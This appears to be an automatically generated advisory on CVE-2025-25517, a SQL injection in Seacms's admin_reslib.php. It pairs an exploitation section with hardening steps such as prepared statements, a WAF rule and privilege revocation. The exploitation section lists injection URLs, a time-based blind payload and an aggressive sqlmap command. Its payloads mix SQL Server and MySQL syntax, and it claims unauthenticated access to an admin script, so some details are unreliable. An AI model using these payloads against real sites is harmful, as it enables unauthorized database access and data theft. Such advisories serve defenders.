Seacms, SQL Injection, CVE-2025-25517 (Critical)

How CVE-2025-25517 Works

Seacms v13.3 and earlier fails to sanitize user input in admin_reslib.php, allowing attackers to inject malicious SQL queries via crafted HTTP requests. The vulnerability occurs due to improper handling of the `id` parameter, enabling unauthorized database access. Attackers can exploit this flaw to extract sensitive data, modify database content, or execute administrative operations without authentication. The lack of prepared statements or input validation makes this a critical SQLi vulnerability.

DailyCVE Form

Platform: Seacms
Version: <=13.3
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025

What Undercode Say:

Exploitation

1. Craft malicious payload:

`http://target.com/admin_reslib.php?id=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--`

2. Automate with SQLmap:

`sqlmap -u "http://target.com/admin_reslib.php?id=1" --risk=3 --level=5`

3. Blind SQLi detection:

`http://target.com/admin_reslib.php?id=1' AND SLEEP(5)--`

Protection

1. Input sanitization:

// Escaping only protects values placed inside quoted SQL strings; prefer step 2.
$id = mysqli_real_escape_string($conn, $_GET['id']);

2. Use prepared statements:

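$stmt = $conn->prepare("SELECT * FROM reslib WHERE id = ?");
$id = (int) ($_GET['id'] ?? 0); // bind_param() needs a variable it can take by reference
$stmt->bind_param("i", $id);
$stmt->execute();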

3. WAF rules:

# ModSecurity requires a unique rule id; 100001 is an arbitrary local value.
SecRule ARGS:id "@detectSQLi" "id:100001,phase:2,deny,status:403"

4. Patch upgrade:

wget https://seacms.org/patches/v13.4.zip
unzip v13.4.zip -d /var/www/html/

5. Log monitoring:

tail -f /var/log/apache2/access.log | grep 'admin_reslib.php'

6. Disable admin access:

<LocationMatch "/admin_reslib.php">
Require ip 192.168.1.0/24
</LocationMatch>

7. Database hardening:

REVOKE ALL PRIVILEGES ON seacms.* FROM 'webuser'@'%';
GRANT SELECT ON seacms.* TO 'webuser'@'%';

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25517